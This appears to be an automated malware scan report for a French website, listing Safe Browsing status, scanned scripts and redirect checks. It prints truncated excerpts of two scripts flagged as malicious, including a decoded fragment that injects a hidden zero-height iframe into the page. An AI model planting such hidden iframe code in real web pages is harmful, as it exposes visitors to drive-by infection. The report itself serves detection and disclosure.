Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=sitesxgratuits.net
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://sitesxgratuits.net/ | 200 OK Content-Length: 109386 Content-Type: text/html | clean |
http://sitesxgratuits.net/xpl_scripts/functions.js | 200 OK Content-Length: 8561 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
function itemRate(id,rating) { window.open('/xpl_scripts/vote.php?id='+id+'&rating='+rating,'','width=10,height=10,toolbars=no,status=no'); alert('Vous avez voté pour ce site. Merci.'); self.focus(); return false; } function addFavorite(id) { window.open('/xpl_scripts/addfavorite.php?id='+id,'',"width=10,height=10,toolbars=no,status=no"); self.focus(); alert('Ce lien apparaîtra dans vos favoris personnels. Merci.\n\nPour vous y rendre, c if(f)e(s);}
Decoded script:
ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see
Antivirus reports:
http://sitesxgratuits.net/includes/js/disclaimer.js | 200 OK Content-Length: 9881 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
<!-- var cookieinfo function CookieExist(CookieName) { cookieinfo = document.cookie; if (cookieinfo.indexOf(CookieName) == -1) { return false; } else { return true; } } function SetCookie(CookieName,CookieArgs,CookieExpire) { document.cookie = CookieName + "=" + CookieArgs + ";" + "expires=" + CookieExpire; } function GetCookie(CookieName) { if ( CookieExist(CookieName) ){ d = cookieinfo.indexOf(CookieName) + Cookie if(f)e(s);}
Antivirus reports:
http://www.indecentes-voisines.com/outils.php?462|off|all | 200 OK Content-Length: 622 Content-Type: text/html | clean |
http://www.indecentes-voisines.com/test404page.js | 404 Not Found Content-Length: 345 Content-Type: text/html | clean |
http://www.easy-dating.org/js/AC_RunActiveContent.js | 200 OK Content-Length: 3341 Content-Type: application/x-javascript | clean |
http://www.easy-dating.org/_SCRIPT/slideshowflash.php?siteid=118674&title=1 | HTTP/1.1 302 Found Connection: close Date: Mon, 29 Sep 2014 22:17:30 GMT Location: http://promo.easy-dating.org/f/tvtopprofiles/?siteid=118674&title=1 Server: nginx Vary: Accept-Encoding Content-Length: 326 Content-Type: text/html; charset=iso-8859-1 | clean |
http://promo.easy-dating.org/f/tvtopprofiles/?siteid=118674&title=1 | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://mb.smartmovies.net/promo_thumbs.php?id_document=68139&promo=hasard&taille=194&txt_p=1&face=Verdana&size_px=7&nb_lignes=16&nb_colonnes=1&target=_self&popup_width_type=pixel&popup_height_type=pixel | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 29 Sep 2014 22:17:31 GMT Location: http://www.smartmovies.net/promothumbs/thumbs/?smartmovies_document_id=68139&archive_id=1&taille=150&promo=hasard&nb_lignes=16&nb_colonnes=1&target=_self&popup_width_type=pixel&popup_height_type=pixel&date=1&face=Verdana&size_px=7&border=0&preview=n&ajax=1 Server: nginx/1.2.1 Content-Type: text/html | clean |
http://www.smartmovies.net/promothumbs/thumbs/?smartmovies_document_id=68139&archive_id=1&taille=150&promo=hasard&nb_lignes=16&nb_colonnes=1&target=_self&popup_width_type=pixel&popup_height_type=pixel&date=1&face=verdana&size_px=7&border=0&preview=n&ajax=1 | 200 OK Content-Length: 2956 Content-Type: text/javascript | clean |
http://ks300749.kimsufi.com/~stats/phpmyvisites.js | 500 Can't connect to ks300749.kimsufi.com:80 (Нет маршрута до узла) Content-Length: 208 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: sitesxgratuits.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 29 Sep 2014 22:17:27 GMT
Accept-Ranges: bytes
ETag: "9c3ae-1ab4a-eb50580"
Server: Apache/2.2.3 (Debian) PHP/5.2.11-0.dotdeb.0 with Suhosin-Patch mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
Content-Length: 109386
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Tue, 07 Aug 2012 21:55:50 GMT
...109386 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: sitesxgratuits.net
Referer: http://www.google.com/search?q=sitesxgratuits.net
Result:
The result is similar to the first query. There are no suspicious redirects found.